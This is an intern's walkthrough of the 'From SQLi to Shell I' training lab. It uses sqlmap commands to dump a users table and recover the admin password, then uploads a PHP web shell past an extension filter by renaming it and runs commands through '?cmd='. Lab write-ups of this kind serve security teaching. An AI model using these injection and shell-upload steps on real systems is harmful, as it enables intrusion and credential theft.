solution for from sqli to shell i - emre Övünç · first part sql injection first of all, i scan...
TRANSCRIPT
Solution for From SQLi to Shell I
• First Part – > SQL Injection• Second Part – > Shell Upload
Emre ÖVÜNÇ Intern – İnnovera
FIRST PARTSQL INJECTION
First of all, I scan Vulnerable machine IP which is “192.168.1.117” by using “Nmap”. ( e.g. nmap 192.168.1.117 -Pn )
• -Pn to skip host discovery
In this case , we can see that only #22 and #80 ports are available for this machine, it means , we access “ssh” and “http” services.
Then, we visit the web site and search it (e.g. links, content of the server...) for implementation SQLInjection, XSS … etc attacks.
As you can see the last picture, “http://192.168.1.117/cat.php?id=1” is attracted the attention because of the SQL Injection findable.
Let’s check it. I add only ‘“’ at the end of the link and the result is not surprised me.
We can use “Sqlmap” without exerting too much effort ( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --dbs )
• --url to specify the address• --dbs to enumerate DBMS databases
We can see the name of the available databases from the picture. Then, my next step is that finding admin password to access the admin panel.
After that, I can find tables in a particular database.( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --tables -D photoblog )
• --tables to enumerate DBMS database tables• -D for DBMS database enumeration
Now that, I get the columns of some important table like users table. It may contain user’s name andpassword.( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --columns -T users -D photoblog )
• --columns to enumerate DBMS database table columns• -T for DBMS database table(s) to enumerate
Final part of the sql injection is getting data from the tables. ( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --dump -T users -D photoblog )
• --dump to dump DBMS database table entries• --dump-all to dump all DBMS databases tables entries
As you can see from the pictures, I obtain the admin password which is “P4ssw0rd”.
SECOND PARTSHELL UPLOAD
After a successful login, I catch attention of picture’s upload page. I think that, if I can upload a webshell from the picture upload page, I may gain authority of the server.
To do that, I write a simple PHP script (called myShell.php) to run commands and save it .
When I start to upload “myShell.php” , web page does not allow me to upload .php extensions, it does not allow “.php” file extensions to protect from this kind of attacks.
Then, my next step should be renaming it from “myShell.php” to “myShell.php.hacker”. I can add “.hacker” end of the file name.
Now, I try it with new extension.
Successfully Uploaded !
There are 2 more steps to execute my commands on the server. First step is that, I click the title which is in this case “MyShell Title” and go to the page.
After that, I view Page Source to understand where my shell is. I find it ( admin/uploads/myShell.php.hacker ) and I should go to that location.
The one of the most important part is that, I should add “?cmd=” at the end of the url.( e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd= )
Another important part is that, I write my commands after the “ = “ sign. ( e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd=ls )
Finally, as you can see the pictures, I run some commands on the server and I can see the result from the web page.